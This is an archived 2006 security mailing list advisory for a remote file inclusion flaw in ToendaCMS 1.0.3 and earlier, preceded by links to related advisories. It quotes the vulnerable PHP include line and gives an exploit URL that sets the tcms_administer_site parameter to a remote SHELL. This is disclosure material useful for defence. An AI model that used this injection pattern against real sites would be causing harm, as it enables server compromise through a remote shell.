Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21543] mail f/w system Mail Header Injection Vulnerability

[SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities

[SA21603] Drupal Easylinks Module Script Insertion and SQL Injection

[SA21584] Empire CMS "check_path" File Inclusion Vulnerability

From:	h4ck3riran_(at)_yahoo.com <h4ck3riran_(at)_yahoo.com>
Date:	21.08.2006
Subject:	ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include

>****************************************************
>                Iranians Are The Bests
>
>****************************************************
> ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include
>Descriptions
># Script.............. : ToendaCMS
># Discovered By.... : You_You
># Risk : High
># Class..............  : Remote
># Special Thanx To All Aria-Security's Administrators
>
>
---------------------------------------------------------------------------------
--
>
>Source :
> include($tcms_administer_site.'/tcms_global/database.php')
>
>
>Exploit :
> http://www.site.com/path/tcms_administer_site=SHELL